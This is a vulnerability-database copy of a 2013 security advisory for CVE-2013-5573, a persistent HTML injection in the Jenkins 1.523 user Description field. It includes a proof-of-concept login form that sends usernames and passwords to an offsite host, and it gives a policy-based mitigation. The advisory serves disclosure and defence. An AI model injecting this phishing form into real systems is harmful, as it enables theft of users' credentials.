Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Jenkins 1.523 - Persistent HTML Code

🗓️ 18 Dec 2013 00:00:00Reported by Christian CatalanoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 41 Views

Default markup formatter permits offsite-bound forms. Jenkins CI v1.523 - Persistent HTML Code vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
FreeBSD		jenkins -- multiple vulnerabilities
14 Feb 201400:00
freebsd
ATTACKERKB		CVE-2013-5573
31 Dec 201316:04
attackerkb
CVE		CVE-2013-5573
31 Dec 201315:00
cve
Cvelist		CVE-2013-5573
31 Dec 201315:00
cvelist
EUVD		EUVD-2013-5413
7 Oct 202500:30
euvd
exploitpack		Jenkins 1.523 - Persistent HTML Code
18 Dec 201300:00
exploitpack
Tenable Nessus		FreeBSD : jenkins -- multiple vulnerabilities (3e0507c6-9614-11e3-b3a5-00e0814cab4e)
17 Feb 201400:00
nessus
Tenable Nessus		Jenkins < 1.551 / 1.532.2 and Jenkins Enterprise 1.509.x / 1.532.x < 1.509.5.1 / 1.532.2.2 Multiple Vulnerabilities
25 Feb 201400:00
nessus
Github Security Blog		Jenkins allows Cross-Site Scripting (XSS) in User Configuration
17 May 202201:31
github
NVD		CVE-2013-5573
31 Dec 201316:04
nvd
Rows per page
###################################################

01. ###  Advisory Information ###

Title: Default markup formatter permits offsite-bound forms
Date published : 2013-12-16
Date of last update: 2013-12-16
Vendors contacted : Jenkins CI v 1.523
Discovered by: Christian Catalano
Severity: Low


02. ###  Vulnerability Information ###

CVE reference: CVE-2013-5573
CVSS v2 Base Score: 4.7
CVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N)
Component/s : Jenkins CI v 1.523
Class : HTML Injection


03. ### Introduction ###

Jenkins CI is an extendable open source continuous integration server 
http://jenkins-ci.org.


04. ### Vulnerability Description ###

The default installation and configuration of Jenkins CI is prone to a 
security vulnerability. The Jenkins CI default markup formatter permits 
offsite-bound forms. This vulnerability could be exploited by a remote 
attacker (a malicious user) to inject malicious persistent HTML script 
code (application side).


05. ### Technical Description / Proof of Concept Code ###

The vulnerability is located in the 'Descriotion' input field of the 
User Configuration  function:

https://localhost:9444/jenkins/user/attacker/configure

To reproduce the vulnerability,  the attacker (a malicious user) can add 
the malicious HTML script code:

<form method="POST" action="http://www.mocksite.org/login/login.php.">
Username: <input type="text" name="username" size="15" /><br />
Password: <input type="password" name="passwort" size="15" /><br />
<div align="center">
<p><input type="submit" value="Login" /></p>
</div>
</form>

in the 'Descriotion' input field and click on save button.
The code execution happens when the victim (an unaware user) view the 
'People List'

https://localhost:9444/jenkins/asynchPeople/

and click on attacker user id.


06. ### Business Impact ###

Exploitation of the persistent web vulnerability requires a low 
privilege web application user account.
Successful exploitation of the vulnerability results in persistent 
phishing and persistent external redirects.


07. ### Systems Affected ###


This vulnerability was tested against:
Jenkins CI v1.523
Older versions are probably affected too, but they were not checked.


08. ### Vendor Information, Solutions and Workarounds ###

Currently, there are no known upgrades or patches to correct this 
vulnerability. It is possible to temporarily mitigate the flaw by 
implementing the following workaround:
'MyspacePolicy' permits
tag("form", "action", ONSITE_OR_OFFSITE_URL,
             "method");

Fix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or 
perhaps <form> could be banned entirely.


09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com


10.  ### Vulnerability History ###

August   21th, 2013: Vulnerability identification
August    4th, 2013: Vendor notification [Jenkins CI]
November 19th, 2013: Vulnerability confirmation [Jenkins CI]
November 19th, 2013: Vendor Solution
December 16th, 2013: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied "as-is" with 
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of 
this information.

###################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Dec 2013 00:00Current
7High risk
Vulners AI Score7
CVSS 24.3
EPSS0.01627
jenkins cipersistent html codevulnerabilityoffsite-bound formshtml injectioncve-2013-5573continuous integration servermyspacepolicychristian catalano
41